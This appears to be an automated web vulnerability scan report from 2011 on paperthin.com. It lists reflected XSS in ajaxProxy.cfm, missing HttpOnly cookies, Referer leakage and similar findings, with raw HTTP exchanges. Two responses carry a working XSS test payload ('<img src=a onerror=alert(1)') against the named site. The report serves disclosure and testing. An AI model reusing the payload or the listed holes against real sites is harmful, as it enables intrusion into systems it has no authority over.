1. Cross-site scripting (reflected)
1.1. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]
1.2. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]
2. Cookie without HttpOnly flag set
3. Cross-domain Referer leakage
3.1. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm
3.2. http://www.paperthin.com/marketing/Flexible-Content-Management.cfm
4. Cross-domain script include
4.1. http://www.paperthin.com/
4.2. http://www.paperthin.com/marketing/Flexible-Content-Management.cfm
4.3. http://www.paperthin.com/products/CommonSpot-Hosted-Edition.cfm
4.4. http://www.paperthin.com/products/Online-Demo-Registration-Form.cfm
4.5. http://www.paperthin.com/products/pricing-options.cfm
4.6. http://www.paperthin.com/solutions/index.cfm
5.1. http://www.paperthin.com/
5.2. http://www.paperthin.com/commonspot/controls/dhtmlmenu/HM_ScriptDOM.js
5.3. http://www.paperthin.com/products/CommonSpot-Hosted-Edition.cfm
5.4. http://www.paperthin.com/products/Online-Demo-Registration-Form.cfm
5.5. http://www.paperthin.com/products/pricing-options.cfm
5.6. http://www.paperthin.com/solutions/index.cfm
6. Content type incorrectly stated
6.1. http://www.paperthin.com/dhtmlmenu_pgdefs_2.js
6.2. http://www.paperthin.com/dhtmlmenu_staticmenus_2.js
6.3. http://www.paperthin.com/products/dhtmlmenu_pgdefs_2.js
6.4. http://www.paperthin.com/products/dhtmlmenu_staticmenus_2.js
6.5. http://www.paperthin.com/solutions/dhtmlmenu_pgdefs_2.js
6.6. http://www.paperthin.com/solutions/dhtmlmenu_staticmenus_2.js
Severity: | High |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /_cs_apps/ajaxProxy.cfm |
GET /_cs_apps/ajaxProxy.cfm Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:16:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Pragma: no-cache Expires: {ts '2011-02-26 18:16:29'} Content-Type: text/html; charset=UTF-8 Content-Length: 1638 <script type="text/javascript" src="/ADF/thirdParty <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService7e534<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /_cs_apps/ajaxProxy.cfm |
GET /_cs_apps/ajaxProxy.cfm Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:16:36 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Pragma: no-cache Expires: {ts '2011-02-26 18:16:36'} Content-Type: text/html; charset=UTF-8 Content-Length: 1638 <script type="text/javascript" src="/ADF/thirdParty <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1) |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.paperthin.com |
Path: | /marketing/Flexible |
GET /marketing/Flexible Host: www.paperthin.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:08:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Set-Cookie: CFID=2258137;expires=Tue, 08-Mar-2011 23:08:44 GMT;path=/ Set-Cookie: CFTOKEN=84911791;expires pragma: no-cache Expires: Mon, 06 Jan 1990 00:00:01 GMT cache-control: no-store Content-Type: text/html; charset=ISO-8859-1 Content-Length: 68572 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /_cs_apps/ajaxProxy.cfm |
GET /_cs_apps/ajaxProxy.cfm Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Pragma: no-cache Expires: {ts '2011-02-26 18:15:51'} Content-Type: text/html; charset=UTF-8 Content-Length: 382 <p><a href="http://twitter.com ...[SNIP]... <span class="tweet-time"><a href="http://twitter.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /marketing/Flexible |
GET /marketing/Flexible Host: www.paperthin.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:08:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Set-Cookie: CFID=2258137;expires=Tue, 08-Mar-2011 23:08:44 GMT;path=/ Set-Cookie: CFTOKEN=84911791;expires pragma: no-cache Expires: Mon, 06 Jan 1990 00:00:01 GMT cache-control: no-store Content-Type: text/html; charset=ISO-8859-1 Content-Length: 68572 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script> <a href="http://www.addthis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | / |
GET / HTTP/1.1 Host: www.paperthin.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:14:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=ISO-8859-1 Content-Length: 59370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script><script src="http://www.google </script> ...[SNIP]... </script> <script language="JavaScript" src="https://stats ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /marketing/Flexible |
GET /marketing/Flexible Host: www.paperthin.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:08:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Set-Cookie: CFID=2258137;expires=Tue, 08-Mar-2011 23:08:44 GMT;path=/ Set-Cookie: CFTOKEN=84911791;expires pragma: no-cache Expires: Mon, 06 Jan 1990 00:00:01 GMT cache-control: no-store Content-Type: text/html; charset=ISO-8859-1 Content-Length: 68572 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </a><script type="text/javascript" src="http://s7.addthis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /products/CommonSpot |
GET /products/CommonSpot Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:58 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 42873 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script><script src="http://www.google </script> ...[SNIP]... </script> <script language="JavaScript" src="https://stats ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /products/Online-Demo |
GET /products/Online-Demo Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 46905 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script><script src="http://www.google </script> ...[SNIP]... </script> <script language="JavaScript" src="https://stats ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /products/pricing-options |
GET /products/pricing-options Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 48019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script><script src="http://www.google </script> ...[SNIP]... </script> <script language="JavaScript" src="https://stats ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /solutions/index.cfm |
GET /solutions/index.cfm HTTP/1.1 Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 55687 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... </script><script src="http://www.google </script> ...[SNIP]... </script> <script language="JavaScript" src="https://stats ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | / |
GET / HTTP/1.1 Host: www.paperthin.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:14:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=ISO-8859-1 Content-Length: 59370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="mailto:support@paperthin.com">support@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:sales@paperthin.com">sales@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:marketing@paperthin.com">marketing@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:jobs@paperthin.com">jobs@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /commonspot/controls |
GET /commonspot/controls Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utma=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:14:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Last-Modified: Fri, 17 Apr 2009 02:42:52 GMT ETag: "9a000000017ecf-87bd Accept-Ranges: bytes Content-Length: 34749 Content-Type: application/javascript /*HM_ScriptDOM.js * by Peter Belesis. v4.0.12 010612 * Copyright (c) 2001 Peter Belesis. All Rights Reserved. * Originally published and documented at http://www.dhtmlab.com/ * You may use this code only if this entire * copyright notice appears unchanged and you publicly display * a link to http://www.dhtmlab.com/. * * Contact peter.belesis@btclick.com for all other uses. */ HM_IE5M = HM_IE && HM_Mac; HM_IE5W = HM_IE && !HM_Mac; HM_NS6 = (navigator.vendor == ("Netscape6") || navigator.product == ("Gecko")); //HM_IEDTD = (HM_IE && document.doc ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /products/CommonSpot |
GET /products/CommonSpot Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:58 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 42873 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="mailto:support@paperthin.com">support@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:sales@paperthin.com">sales@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:marketing@paperthin.com">marketing@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:jobs@paperthin.com">jobs@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /products/Online-Demo |
GET /products/Online-Demo Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 46905 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="mailto:support@paperthin.com">support@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:sales@paperthin.com">sales@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:marketing@paperthin.com">marketing@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:jobs@paperthin.com">jobs@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /products/pricing-options |
GET /products/pricing-options Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 48019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="mailto:support@paperthin.com">support@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:sales@paperthin.com">sales@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:marketing@paperthin.com">marketing@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:jobs@paperthin.com">jobs@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.paperthin.com |
Path: | /solutions/index.cfm |
GET /solutions/index.cfm HTTP/1.1 Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 55687 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <a href="mailto:support@paperthin.com">support@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:sales@paperthin.com">sales@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:marketing@paperthin.com">marketing@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:jobs@paperthin.com">jobs@paperthin.com</a> ...[SNIP]... <a style="" href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... <a href="mailto:info@paperthin.com">info@paperthin.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.paperthin.com |
Path: | /dhtmlmenu_pgdefs_2.js |
GET /dhtmlmenu_pgdefs_2.js HTTP/1.1 Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utma=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:14:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Last-Modified: Mon, 22 Nov 2004 20:20:10 GMT ETag: "40000000118bd-3b0 Accept-Ranges: bytes Content-Length: 944 Content-Type: application/javascript HM_PG_MenuWidth = 150; HM_PG_BGColor = '#CCCCCC'; HM_PG_BGColorOver = '#eb8f35'; HM_PG_ItemPadding = 2; HM_PG_BorderWidth = 1; HM_PG_BorderColor = '#000000'; HM_PG_BorderStyle = 'solid'; HM_PG_Separat ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.paperthin.com |
Path: | /dhtmlmenu_staticmenus_2 |
GET /dhtmlmenu_staticmenus_2 Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utma=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:14:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Last-Modified: Fri, 25 Feb 2011 19:20:14 GMT ETag: "40000000118be-d5f Accept-Ranges: bytes Content-Length: 3423 Content-Type: application/javascript paramArray = []; HM_Array6758_4 = [paramArray]; paramArray = []; HM_Array6726_4 = [paramArray]; menuPosCol['elMenu6734'] = 'bottom_left'; HM_a_TreesToBuild[HM_a ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.paperthin.com |
Path: | /products/dhtmlmenu |
GET /products/dhtmlmenu Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Last-Modified: Mon, 22 Nov 2004 20:31:20 GMT ETag: "98000000013b4c-3b0 Accept-Ranges: bytes Content-Length: 944 Content-Type: application/javascript HM_PG_MenuWidth = 150; HM_PG_BGColor = '#CCCCCC'; HM_PG_BGColorOver = '#eb8f35'; HM_PG_ItemPadding = 2; HM_PG_BorderWidth = 1; HM_PG_BorderColor = '#000000'; HM_PG_BorderStyle = 'solid'; HM_PG_Separat ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.paperthin.com |
Path: | /products/dhtmlmenu |
GET /products/dhtmlmenu Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:39 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Last-Modified: Sat, 26 Feb 2011 22:21:35 GMT ETag: "43000000013b56-d5f Accept-Ranges: bytes Content-Length: 3423 Content-Type: application/javascript paramArray = []; HM_Array6758_4 = [paramArray]; paramArray = []; HM_Array6726_4 = [paramArray]; menuPosCol['elMenu6734'] = 'bottom_left'; HM_a_TreesToBuild[HM_a ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.paperthin.com |
Path: | /solutions/dhtmlmenu |
GET /solutions/dhtmlmenu Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Last-Modified: Wed, 24 Mar 2010 23:57:52 GMT ETag: "80000000147b6-3b0 Accept-Ranges: bytes Content-Length: 944 Content-Type: application/javascript HM_PG_MenuWidth = 150; HM_PG_BGColor = '#CCCCCC'; HM_PG_BGColorOver = '#eb8f35'; HM_PG_ItemPadding = 2; HM_PG_BorderWidth = 1; HM_PG_BorderColor = '#000000'; HM_PG_BorderStyle = 'solid'; HM_PG_Separat ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.paperthin.com |
Path: | /solutions/dhtmlmenu |
GET /solutions/dhtmlmenu Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
